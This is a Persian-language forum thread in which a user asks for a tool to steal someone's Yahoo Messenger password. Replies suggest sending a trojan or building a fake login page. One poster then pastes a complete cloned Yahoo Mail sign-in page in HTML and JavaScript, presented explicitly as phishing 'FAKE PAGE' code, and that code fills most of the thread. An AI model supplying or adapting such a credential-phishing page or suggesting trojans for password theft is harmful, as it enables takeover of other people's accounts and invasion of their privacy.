تبلیغات :
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]




صفحه 1 از 3 123 آخرآخر
نمايش نتايج 1 به 10 از 29

نام تاپيک: نرم افزاري براي هك Yahoo! ID

  1. #1
    اگه نباشه جاش خالی می مونه Gangster_Benington's Avatar
    تاريخ عضويت
    Jun 2005
    محل سكونت
    VAGABOND
    پست ها
    348

    پيش فرض نرم افزاري براي هك Yahoo! ID

    :twisted: من يه نرم افزار مي خوام كه پسورد كسي كه ميخوام تو Yahoo Messenger پيداكنه!

  2. #2
    حـــــرفـه ای sa3er's Avatar
    تاريخ عضويت
    Jul 2005
    محل سكونت
    Tehran
    پست ها
    2,382

    پيش فرض

    نوشابه يا دسر همراش نمی خوای؟!! :P

    خوشبختانه همچين نرافزاری وجود نداره..
    هر چند راههای ديگه ای مثل فرستادن يه trojan تو سيستم طرف برای log کردنه....

    ببخشيد بايد برم!

  3. #3
    Banned K053_LSH_KV90's Avatar
    تاريخ عضويت
    May 2005
    محل سكونت
    Backdo0rs
    پست ها
    1,407

    پيش فرض

    سلام
    pro_gangster
    =========
    خیلی تو کانتر ادا داری
    =========
    چند راه وجود داره
    1.تروجان بفرستی
    2.fake page بسازی
    و...
    که بقیه بی خوده
    ساب سون
    :lol: :lol: :lol: :lol:
    اگه بیستر توضیح می خوای پیغتم خصوصی بده
    اینم کد FAKE PAGE
    =========
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Yahoo! Mail - The best web-based email!</title>
    <link type="text/css" rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/i/reg/mail_style.css">


    <script language="javascript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script> <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
    <META HTTP-EQUIV="Expires" CONTENT="0">
    <META HTTP-EQUIV=Refresh CONTENT=900;>
    <style type="text/css">
    body { margin-top: 0px;}
    </style>
    <script language="JavaScript">
    <!--
    function yg_popup(u,n,w,h,k){
    var a=[],o=null,r=arguments;
    a[0]="width="+w+",height="+h;
    a[1]=",scrollbars="+((k&1)?1:0);
    a[2]=",resizable="+((k&2)?1:0);
    a[3]=",toolbar="+((k&4)?1:0);
    a[4]=",status="+((k&8)?1:0);
    a[5]=",location="+((k&16)?1:0);
    a[6]=",menubar="+((k&32)?1:0);
    if(r.length>=6){a[7]=(document.layers)?",screenX="+r[5]:",left="+r[5]}
    if(r.length>=7){a[8]=(document.layers)?",screenY="+r[6]:",top="+r[6]}
    a=a.join("");o=open(u,n,a);o.focus();
    return o;
    }
    -->
    </script>
    </head>
    <body bgcolor="#ffffff" onload="document.login_form.login.focus();">
    <script language="javascript">
    <!--
    hasMsgr = 0;
    function dontGotIt(){
    hasMsgr = 0;
    document.login_form.hasMsgr.value=0;
    }

    function doGotIt(){
    hasMsgr = 1;
    document.login_form.hasMsgr.value=1;
    }
    //-->
    </script>


    <script language="javascript">
    /*
    * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
    * Digest Algorithm, as defined in RFC 1321.
    * Copyright (C) Paul Johnston 1999 - 2000.
    * Updated by Greg Holt 2000 - 2001.
    * See [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] for details.
    */

    /*
    * Convert a 32-bit number to a hex string with ls-byte first
    */
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
    str = "";
    for(j = 0; j <= 3; j++)
    str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
    hex_chr.charAt((num >> (j * 8)) & 0x0F);
    return str;
    }

    /*
    * Convert a string to a sequence of 16-word blocks, stored as an array.
    * Append padding bits and the length, as described in the MD5 standard.
    */
    function str2blks_MD5(str)
    {
    nblk = ((str.length + 8) >> 6) + 1;
    blks = new Array(nblk * 16);
    for(i = 0; i < nblk * 16; i++) blks[i] = 0;
    for(i = 0; i < str.length; i++)
    blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
    blks[i >> 2] |= 0x80 << ((i % 4) * 8);
    blks[nblk * 16 - 2] = str.length * 8;
    return blks;
    }

    /*
    * Add integers, wrapping at 2^32. This uses 16-bit operations internally
    * to work around bugs in some JS interpreters.
    */
    function add(x, y)
    {
    var lsw = (x & 0xFFFF) + (y & 0xFFFF);
    var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
    return (msw << 16) | (lsw & 0xFFFF);
    }

    /*
    * Bitwise rotate a 32-bit number to the left
    */
    function rol(num, cnt)
    {
    return (num << cnt) | (num >>> (32 - cnt));
    }

    /*
    * These functions implement the basic operation for each round of the
    * algorithm.
    */
    function cmn(q, a, b, x, s, t)
    {
    return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
    return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
    return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
    return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
    return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }

    /*
    * Take a string and return the hex representation of its MD5.
    */
    function MD5(str)
    {
    x = str2blks_MD5(str);
    var a = 1732584193;
    var b = -271733879;
    var c = -1732584194;
    var d = 271733878;

    for(i = 0; i < x.length; i += 16)
    {
    var olda = a;
    var oldb = b;
    var oldc = c;
    var oldd = d;

    a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
    d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
    c = ff(c, d, a, b, x[i+ 2], 17, 606105819);
    b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
    a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
    d = ff(d, a, b, c, x[i+ 5], 12, 1200080426);
    c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
    b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
    a = ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
    d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
    c = ff(c, d, a, b, x[i+10], 17, -42063);
    b = ff(b, c, d, a, x[i+11], 22, -1990404162);
    a = ff(a, b, c, d, x[i+12], 7 , 1804603682);
    d = ff(d, a, b, c, x[i+13], 12, -40341101);
    c = ff(c, d, a, b, x[i+14], 17, -1502002290);
    b = ff(b, c, d, a, x[i+15], 22, 1236535329);

    a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
    d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
    c = gg(c, d, a, b, x[i+11], 14, 643717713);
    b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
    a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
    d = gg(d, a, b, c, x[i+10], 9 , 38016083);
    c = gg(c, d, a, b, x[i+15], 14, -660478335);
    b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
    a = gg(a, b, c, d, x[i+ 9], 5 , 568446438);
    d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
    c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
    b = gg(b, c, d, a, x[i+ 8], 20, 1163531501);
    a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
    d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
    c = gg(c, d, a, b, x[i+ 7], 14, 1735328473);
    b = gg(b, c, d, a, x[i+12], 20, -1926607734);

    a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
    d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
    c = hh(c, d, a, b, x[i+11], 16, 1839030562);
    b = hh(b, c, d, a, x[i+14], 23, -35309556);
    a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
    d = hh(d, a, b, c, x[i+ 4], 11, 1272893353);
    c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
    b = hh(b, c, d, a, x[i+10], 23, -1094730640);
    a = hh(a, b, c, d, x[i+13], 4 , 681279174);
    d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
    c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
    b = hh(b, c, d, a, x[i+ 6], 23, 76029189);
    a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
    d = hh(d, a, b, c, x[i+12], 11, -421815835);
    c = hh(c, d, a, b, x[i+15], 16, 530742520);
    b = hh(b, c, d, a, x[i+ 2], 23, -995338651);

    a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
    d = ii(d, a, b, c, x[i+ 7], 10, 1126891415);
    c = ii(c, d, a, b, x[i+14], 15, -1416354905);
    b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
    a = ii(a, b, c, d, x[i+12], 6 , 1700485571);
    d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
    c = ii(c, d, a, b, x[i+10], 15, -1051523);
    b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
    a = ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
    d = ii(d, a, b, c, x[i+15], 10, -30611744);
    c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
    b = ii(b, c, d, a, x[i+13], 21, 1309151649);
    a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
    d = ii(d, a, b, c, x[i+11], 10, -1120210379);
    c = ii(c, d, a, b, x[i+ 2], 15, 718787259);
    b = ii(b, c, d, a, x[i+ 9], 21, -343485551);

    a = add(a, olda);
    b = add(b, oldb);
    c = add(c, oldc);
    d = add(d, oldd);
    }
    return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }

    function valid_js() {
    // anything that claims NS 4 or higher functionality better work
    if (navigator.userAgent.indexOf("Mozilla/") == 0) {
    return (parseInt(navigator.appVersion) >= 4);
    }
    return false;
    }

    function hash(form,login_url) {
    // this is Javascript enabled browser
    //document.login_form[".js"].value=1;
    // rudimentary check for a 4.x brower. should catch IE4+ and NS4.*
    var url;

    if (arguments.length > 1 && login_url != "") { // in case login_url is not passed in
    url = login_url;
    } else {
    url = "http://login.yahoo.com/config/login";
    }
    url += "?";

    if (valid_js()) {
    var passwd = form.passwd.value;
    var challenge = form[".challenge"].value;
    var hash2 = MD5(form.passwd.value) + challenge;
    var hash;
    if(form.passwd.value){
    hash=MD5(hash2);
    } else {
    hash="";
    }
    var js = 0;

    for(i=0; i<form.elements.length; i++){
    if(form.elements[i].name.length <=0) {
    continue;
    }
    if(i > 0){
    url += "&";
    }
    url += form.elements[i].name;
    url += "=";
    if(form.elements[i].name == "passwd"){
    url += hash;
    } else if (form.elements[i].type == "checkbox" && !form.elements[i].checked) {
    url += "";
    } else if (form.elements[i].type == "radio" && !form.elements[i].checked) {
    url += "";
    } else if (form.elements[i].name == ".save"){
    url += "1"; // "Sign in" causes problem with the space
    } else if (form.elements[i].name == ".js"){
    js = 1;
    url += "1";
    } else {
    url += escape(form.elements[i].value);
    }
    }
    // indicate the password is hashed.
    url += "&.hash=1";
    if(js == 0){
    url += "&.js=1";
    }
    url += "&.md5=1";
    //alert("url=" + url);
    location.href=url;
    // prevent from running this again. Allow the server response to submit the form directly
    form.onsubmit=null;

    // abort normal form submission
    return false;
    }
    // allow normal form submission
    return true;
    }
    </script>

    <center>
    <table cellpadding="0" cellspacing="0" border="0" width="720">
    <tr>
    <td height="5" nowrap><spacer type="block" width="1" height="5"></td>
    </tr>
    <tr>
    <td>
    <table cellspacing=0 cellpadding=0 width=100% border=0>
    <tr>
    <td width=1% align=left>
    <table width=1% cellspacing=0 cellpadding=0 border=0>
    <tr>
    <td width=1% align=left nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif" width="196" height="33" border="0" alt="Yahoo! Mail"></td>
    </tr>
    </table>
    </td>

    <td width=100% align=right nowrap valign=bottom>
    <table width=100% cellspacing=0 cellpadding=0 border=0>
    <tr>
    <td width=99% align=right nowrap valign=bottom><font face=Arial size=-1><a href="http://www.yahoo.com " target="www">Yahoo!</a> - <a href="http://help.yahoo.com/help/us/edit/" target="help">Help</a></font>
    <br><hr size=1 noshade></td>
    </tr>
    </table>
    </td>
    <td align=right width="1%"> </td>
    </td>
    </tr>
    </table>
    </td>
    </tr>
    <tr>
    <td height="5" nowrap><spacer type="block" width="1" height="5"></td>
    </tr>
    </table>


    <!-- Start: Main body -->
    <table width="720" border="0" cellpadding="0" cellspacing="0" bgcolor="#B6C7E5">
    <tr>
    <td align="left" valign="top" width="12" nowrap><img name="login_r1_c1" src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r1_c1.gif" width="12" height="10" border="0" alt=""></td>
    <td width="450" nowrap valign="top">
    <!-- Start: Promo include here -->
    <table border="0" cellpadding="0" cellspacing="0" width="450" bgcolor="#B6C7E5">
    <tr>
    <td width="15" nowrap><spacer type="block" width="15"></td>
    <td width="197" align="right" valign="middle" class="headlineblue" nowrap><br>
    Yahoo! Mail<br> helps
    me<br> stay in touch.</td>
    <td width="214" align="left" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_woman.jpg" width="195" height="130" alt=""></td>
    <td width=24 nowrap><spacer type="block" width="20"></td>
    </tr>
    <tr>
    <td colspan="4" bgcolor="#250175" width="450" height"8"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_blue_horiz.gif" width="450" height="8" alt=""></td>
    </tr>
    </table>

    <table border="0" cellpadding="0" cellspacing="0" width="450" bgcolor="#B6C7E5">
    <tr>
    <td nowrap height="10" colspan="4"><spacer type=vertical size=20></td>
    </tr>
    <tr>
    <td nowrap width="10"><spacer type="block" width="10"></td>
    <td valign="top" class="bodyblue" width="276" nowrap align="left">
    <span style="font-size: 18px; line-height: 22px; "><font style="font-size: 18px; line-height: 22px;">New to Yahoo!?</font></span><br>
    <font class="bodyblue"><b>Get a free
    <a href="http://us.rd.yahoo.com/reg/login0/no_suli/signup1_lhs/us/ym/*http://billing.mail.yahoo.com/bm/MailReg?.done=http%3A//mail.yahoo.com&.intl=us&.src=ym&.u=bep 76651b4btv&partner=&.p=&promo=&.la st=" style="color: #7B0099;">
    Yahoo! Mail</a> account</b> – it's a breeze to stay connected and manage your busy life.</font>
    <ul style="margin-left: 10px; padding-left: 10; margin-top: 10px;" >
    <li style="margin-top: 6px;"><font class="bodyblue"><b>1GB of email storage</b><BR>Keep more of what's important to you </font></li>
    <li style="margin-top: 6px;"><font class="bodyblue"><b>Powerful spam protection</b><BR>Read only the mail you really want </font></li>
    <li style="margin-top: 6px;"><font class="bodyblue"><b>Get your mail anywhere</b><BR>All you need is a web connection</font></li>
    <br>
    <a href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://us.info.mail.yahoo.com/" style="color: #7B0099;"><font class="bodyblue">Learn More</font></a>
       <a href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://tour.mail.yahoo.com/mailtour.html" style="color: #7B0099;" onclick="yg_popup('http://us.rd.yahoo.com/reg/login/new_ym/us/*http://tour.mail.yahoo.com/mailtour.html','y',700,450); return false" target="_blank"><font class="bodyblue">Take a Tour</font></a>
    </ul>
    <table border="0" align="center" cellpadding="0" cellspacing="0" height="95">
    <tr>
    <td width="60" align="left">
    <a href="http://reviews.cnet.com/Yahoo_Mail/4505-9236_7-30980704.html?part=editchoice&subj=yahoomail" target="cnet"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/EC_aug04_47x95_2.gif" width="47" height="95" border="0" align="left" vspace="0" alt="CNET Editors' Choice"></a>
    </td>
    <td width="300" align="center">
    <form action="http://us.rd.yahoo.com/reg/login0/no_suli/signup2_lhs/us/ym/*http://billing.mail.yahoo.com/bm/MailReg" method="get">
    <input type=hidden name=.src value="ym">
    <input type=hidden name=.intl value="us">
    <input type=hidden name=.done value="http://mail.yahoo.com">
    <input type=hidden name=.u value="bep76651b4btv">
    <input type=hidden name=.v value="0">
    <input type="submit" value="Sign Up Now" class="buttonpurple"></form>
    </td>
    </tr>
    </table>
    </td>
    <td align="center" valign="top"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_divide1.gif" width="23" height="242" border=0></td>
    <td valign="top" class="bodyblue"><br>
    <b>Need more? Get <a href="http://us.rd.yahoo.com/mail_us/login/evt=19821/*http://mailplus.yahoo.com" style="color: #7B0099;">Yahoo! Mail Plus</b></a>.<br><br>
    Mail Plus offers personalized spam protection, a virtually unlimited 2GB of
    storage, POP access, and more for only <strong>$19.99/year</strong>.<br><br>
    <a href="http://us.rd.yahoo.com/mail_us/login/evt=19821/*http://mailplus.mail.yahoo.com/help" style="color: #7B0099;">Learn more</a>
    </td>
    </tr>
    </table>

    <!-- End: Promo include here -->
    </td>
    <td width="10" nowrap><spacer type="block" width="10"></td>
    <td width="" nowrap valign="top">
    <!-- Start: Login box include here -->
    <table border="0" cellpadding="0" cellspacing="0" bgcolor="#5350B9" height=96%>
    <form method=post action="https://login.yahoo.com/config/login?" autocomplete=off name=login_form onsubmit="return hash(this,'http://us.rd.yahoo.com/reg/login0/no_suli/login/us/ym/*http://login.yahoo.com/config/login')"><input type=hidden name=.tries value="1">
    <input type=hidden name=.src value="ym">
    <input type=hidden name=.md5 value="">
    <input type=hidden name=.hash value="">
    <input type=hidden name=.js value="">
    <input type=hidden name=.last value="">
    <input type=hidden name=promo value="">
    <input type=hidden name=.intl value="us">
    <input type=hidden name=.bypass value="">
    <input type=hidden name=.partner value="">
    <input type=hidden name=.u value="bep76651b4btv">
    <input type=hidden name=.v value="0">
    <input type=hidden name=.challenge value="6tOkxqgaszFRpNXKFhh5SXk4kVsP">
    <input type=hidden name=.yplus value="">
    <input type=hidden name=.emailCode value="">
    <input type=hidden name=pkg value="">
    <input type=hidden name=stepid value="">
    <input type=hidden name=.ev value="">
    <input type=hidden name=hasMsgr value=0>
    <input type=hidden name=.chkP value=Y>
    <input type=hidden name=.done value="http://mail.yahoo.com">
    <script language="javascript">
    <!--
    browser_string = navigator.appVersion + " " + navigator.userAgent;
    if ( browser_string.indexOf("MSIE") < 0 ) {
    if (navigator.mimeTypes) {
    for (i = 0 ; i < navigator.mimeTypes.length ; i++) {
    if (navigator.mimeTypes[i].suffixes.indexOf("yps") > -1) {
    doGotIt();
    }
    }
    } else {
    dontGotIt();
    }
    } else {
    if (browser_string.indexOf("Windows")>=0) {
    doGotIt();
    document.write('<object classid="clsid:41695A8E-6414-11D4-8FB3-00D0B7730277" CODEBASE="javascript:dontGotIt();" ID="Ymsgr" width="1" height="1">');
    document.write('</object>');
    }
    }
    //-->
    </script>

    <tr bgcolor="#B6C7E5">
    <td colspan="3" height="23"><spacer type="vertical" height="23"></td>
    </tr>
    <tr>
    <td align="left" valign="top" width="10" height="9" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r2_c4.gif" width="10" height="9" border="0" alt=""></td>
    <td> </td>
    <td align="right" valign="top" width="9" height="10" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r2_c6.gif" width="9" height="10" border="0" alt=""></td>
    </tr>

    <tr>
    <td width="10" nowrap> </td>
    <td>
    <table border="0" cellspacing="0" cellpadding="0">
    <tr>
    <td align="right" class="bodywhite" height=50><br>
    <span style="font-size: 15px; line-height: 17px; font-weight: bold;"><b>Already have a Yahoo! ID?</b></span><br>Please sign in to read or send mail<br>
    <hr size=1 noshade color="#8380DE"><br><br>Enter your ID and password<br>
    </td>
    </tr>
    <!------------------ BEGIN login form ------------------->
    <tr>
    <td>
    <table border="0" cellpadding="2" cellspacing="0">
    <tr>
    <td align="right" nowrap class="bodywhite">Yahoo! ID:</td>
    <td align="right"><input name="login" style="width:130px" value=""></td>
    </tr>
    <tr>
    <td align="right" nowrap class="bodywhite">Password:</td>
    <td align="right"><input name="passwd" style="width:130px" value="" type="password"></td>
    </tr>
    <tr>
    <td colspan="2" nowrap align="right" class=bodywhite><input type="checkbox" name=".persistent" value="y">Remember my ID on this computer<br><br></td>
    </tr>
    <tr>
    <td colspan="2" align="right"><input name=".save" type="submit" value="Sign In" class=buttonwhite></td>
    </tr>
    </table>
    </td>
    </tr>
    <!------------------ END login form ----------------------->
    <!------------------ BEGIN login links -------------------->
    <tr>
    <td align="right" valign="top" class="bodywhite"><br>MODE:
    Standard | <a href="http://us.rd.yahoo.com/reg/login0/no_suli/ssl_lib/us/ym/*https://login.yahoo.com/config/login?.src=ym&.v=0&.u=bep76651b4btv&.l ast=&promo=&.intl=us&.bypass=&.par tner=&pkg=&stepid=&.done=http%3A//mail.yahoo.com" style="color: #7AE8FF">Secure</a><br>
    <br><br>
    <hr size=1 noshade color="#8380DE">
    <br>
    <a href="http://us.rd.yahoo.com/reg/login0/no_suli/sih_lib/us/ym/*http://login.yahoo.com/config/login?.src=ym&.intl=us&.help=1&.v=0&am p;.u=bep76651b4btv&.last=&.last=&promo =&.bypass=&.partner=&pkg=&stepid=& amp;.done=http%3A//mail.yahoo.com" style="color: #7AE8FF">Sign-in help</a><br>
    <a href="http://us.rd.yahoo.com/reg/login0/no_suli/forgot_lib/us/ym/*http://edit.yahoo.com/config/eval_forgot_pw?new=1&.done=http://mail.yahoo.com&.src=ym&partner=&.partn er=&.intl=us&pkg=&stepid=&.last=" style="color: #7AE8FF">Forgot your password?</a><br>
    <br>
    </td>
    </tr>
    </table>
    </td>
    <td width="9" nowrap> </td>
    <!------------------ END login links ---------------------->
    </tr>
    <tr>
    <td align="left" valign="bottom" width="10" height="10" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r8_c4.gif" width="10" height="10" border="0" alt=""></td>
    <td> </td>
    <td align="right" valign="bottom" width="9" height="10" nowrap><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r8_c6.gif" width="9" height="10" border="0" alt=""></td>
    </tr>
    <tr bgcolor="#B6C7E5">
    <td colspan="3" height="10"><SPACER TYPE="vertical" SIZE="10"></td>
    </tr>
    </form>
    </table>
    <!-- End: Login box include here -->
    </td>
    <td align="right" valign="top" width="10"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r1_c7.gif" width="10" height="10" border="0" alt=""></td>

    </tr>
    </table>
    <table width="720" border="0" cellpadding="0" cellspacing="0" bgcolor="#B6C7E5">
    <tr>
    <td align="left" valign="bottom" width="10"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r9_c1.gif" width="12" height="10" border="0" alt=""></td>
    <td width="696" nowrap><spacer type="block" width="696"></td>
    <td align="right" valign="bottom" width="10"><img src="http://us.i1.yimg.com/us.yimg.com/i/reg/login_r9_c7.gif" width="12" height="10" border="0" alt=""></td>
    </tr>
    </table>
    <!-- End: Mail Body -->

    <br>
    <!-- login_footer -->
    <table cellpadding="0" cellspacing="0" border="0" width="720">
    <tr>
    <td align=center>
    <div align="center">
    <table border=0 cellspacing=0 cellpadding=2 width=100%>
    <tr>
    <td align="center" colspan="2"><font face="arial" size="2"><strong><font color="red">New!</font></strong> PhotoMail from Yahoo! Mail is
    available in Beta. <a href="http://photomail.mail.yahoo.com" target="new">Try it
    today</a><br></font><br></td>
    </tr>
    <tr>
    <td align="left" colspan=2><font face="Arial"><b>Yahoo! Mail for International Users</b></font>
    </td>
    </tr>
    <tr>
    <td valign=top align=right><small><font face="Arial" size="-2"><i>Europe</i> :</font></small></td>
    <td valign=top><small><font face="Arial" size="-2"><a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=dk&.src=ym&.done=http://mail.yahoo.com">Danmark</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=de&.src=ym&.done=http://mail.yahoo.com">Deutschland</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=es&.src=ym&.done=http://mail.yahoo.com">España</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=fr&.src=ym&.done=http://mail.yahoo.com">France</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=gr&.src=ym&.done=http://mail.yahoo.com">Greece</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=it&.src=ym&.done=http://mail.yahoo.com">Italia</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=no&.src=ym&.done=http://mail.yahoo.com">Norge</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=pl&.src=ym&.done=http://mail.yahoo.com">Polska</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=se&.src=ym&.done=http://mail.yahoo.com">Sverige</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=tr&.src=ym&.done=http://mail.yahoo.com">Tأ¼rkiye</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=uk&.src=ym&.done=http://mail.yahoo.com">UK</a> - <a
    href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=ie&.src=ym&.done=http://mail.yahoo.com">Ireland</a>
    </font></small></td>
    </tr>
    <tr>
    <td valign=top align=right><small><font face="Arial" size="-2"><i>Pacific Rim</i>:</font></small></td>
    <td valign=top><small><font face="Arial" size="-2"><a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=au&.src=ym&.done=http://mail.yahoo.com">Australia</a>/<a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=nz&.src=ym&.done=http://mail.yahoo.com">NZ</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=cn&.src=ym&.done=http://mail.yahoo.com">China</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=hk&.src=ym&.done=http://mail.yahoo.com">Hong Kong</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.india.yahoo.com/config/login?.intl=in&.src=ym&.done=http://mail.yahoo.com">India</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=id&.src=ym&.done=http://mail.yahoo.com">Indonesia</a> -
    <a
    href="http://us.rd.yahoo.com/login/ym/*http://mail.yahoo.co.jp/">Japan</a> -
    <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.korea.yahoo.com/config/login?.intl=kr&.src=ym&.done=http://mail.yahoo.com">Korea</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=my&.src=ym&.done=http://mail.yahoo.com">Malaysia</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=ph&.src=ym&.done=http://mail.yahoo.com">Philippines</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=sg&.src=ym&.done=http://mail.yahoo.com">Singapore</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=th&.src=ym&.done=http://mail.yahoo.com">Thailand</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=tw&.src=ym&.done=http://mail.yahoo.com">Taiwan</a> - <a
    href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=vn&.src=ym&.done=http://mail.yahoo.com">Viل»‡t Nam</a></font></small></td>
    </tr>
    <tr>
    <td valign=top align=right><small><font face="Arial" size="-2"><i>Americas</i>:</font></small></td>
    <td valign=top><small><font face="Arial" size="-2">
    <a
    href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ar&.src=ym&.done=http://mail.yahoo.com">Argentina</a> - <a
    href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=br&.src=ym&.done=http://mail.yahoo.com">Brasil</a> - <a
    href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ca&.src=ym&.done=http://mail.yahoo.com">Canada</a> - <a
    href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=mx&.src=ym&.done=http://mail.yahoo.com">Mexico</a> - <a
    href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=b5&.src=ym&.done=http://mail.yahoo.com">in Chinese</a> - <a
    href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=e1&.src=ym&.done=http://mail.yahoo.com">en Español</a> -
    <a href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ru&.src=ym&.done=http://mail.yahoo.com">in Russian</a>
    </font></small></td>
    </tr>
    </table></div>
    </td>
    <td></td>
    </tr>
    </table>
    <!-- end login_footer -->
    </center>

    <center>
    <hr width="750">
    <table cellpadding="0" cellspacing="0" border="0" width="750" summary="Footer">
    <tr>
    <td align="center" class="footer">Copyright © 2005 Yahoo! Inc. All rights reserved.
    <a href="http://docs.yahoo.com/info/copyright/copyright.html" target="cp">Copyright/IP Policy</a> - <a href="http://docs.yahoo.com/info/terms/" target="tos">Terms of Service</a> - <a href="http://security.yahoo.com/" target="sc">Guide to Online Security</a><BR>
    NOTICE: We collect personal information on this site.<BR>
    To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="pp">Privacy Policy</a>
    </td>
    </tr>
    <tr>
    <td align="center">
    </td>
    </tr>
    </table>
    </table>
    </center>
